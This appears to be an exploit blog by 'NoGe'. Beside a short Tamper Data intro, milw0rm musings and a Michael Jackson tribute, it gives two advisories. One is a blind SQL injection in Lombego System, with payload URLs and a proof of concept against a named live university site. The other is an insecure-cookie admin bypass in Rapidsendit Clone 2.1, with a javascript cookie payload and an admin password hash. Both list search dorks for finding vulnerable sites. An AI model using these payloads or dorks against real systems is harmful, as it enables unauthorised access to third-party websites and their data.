NoGe.ZoNe

[x] what is Tamper Data?

Tamper Data is one of Mozilla Firefox addons.
that use to view and modify HTTP/HTTPS headers and post parameters.
trace and time http response/requests.
security test web applications by modifying POST parameters.
or we can use this addons to find Insecure Cookie Handling Vulnerability.


[x] how to get it?

open this link below.
https://addons.mozilla.org/en-US/firefox/addon/966
and click Add to Firefox. this will automaticlly installed on you Firefox
after install it you need to restart your browser.


[x] how to use it?

you can download the video tutorial here
there is an example how to use Tamper Data
to find Insecure Cookie Handling Vulnerability.
have fun and be safe!! :)




./NoGe

[o] Lombego System Blind SQL Injection Vulnerability
Software : Lombego System
Vendor   : http://www.lombego.de/
Author   : NoGe

[o] Vulnerable file
index.php

[o] Exploit
http://localhost/[path]/index.php?page_id=[SQL]
http://localhost/[path]/index.php?page_id=1 and substring(@@version,1,1)=4
http://localhost/[path]/index.php?page_id=1 and substring(@@version,1,1)=5

[o] Proof of Concept
https://sabreconference.wifa.uni-leipzig.de/frontend/index.php?page_id=566+and+substring(@@version,1,1)=4
https://sabreconference.wifa.uni-leipzig.de/frontend/index.php?page_id=566+and+substring(@@version,1,1)=5

[o] Dork
"powered by Lombego Systems"

[o] Notes
this is an private sript and some target are in one host.

is milw0rm offline now?
coz i read str0ke goodbye statement on milw0rm header.
here is the header.



submission are closed too.
u can see it in the milw0rm footer.



Connection to milw0rm.com (80) timed out.
so is milw0rm really closed and offline or just maintenance?

[o] Rapidsendit Clone 2.1 Insecure Cookie Handling Vulnerability
Software : Rapidsendit Clone version 2.1
Vendor   : http://www.rapidsendit.com/
Demo     : http://www.rapidsendit.com/script/demo.html
Author   : NoGe

[o] Vulnerable file
admin.php

[o] Exploit
http://localhost/[path]/admin.php
javascript:document.cookie="logged=[md5_password_hash]; path=/";

[o] Proof Of Concept
http://www.rapidsendit.com/script/demo/admin.php
replace url above with this javascript
javascript:document.cookie="logged=696d29e0940a4957748fe3fc9efd22a3; path=/";
696d29e0940a4957748fe3fc9efd22a3 = admin password

[o] Dork
"Powered By Rapidsendit Clone"

There Are Ways
To Get There
If You Care Enough
For The Living
Make A Little Space
Make A Better Place

Heal The World
Make It A Better Place
For You And For Me
And The Entire Human Race
There Are People Dying
If You Care Enough
For The Living
Make A Better Place
For You And For Me


"He Is The Greatest Artist On Earth"

Goodbye Jacko!! Rest In Peace...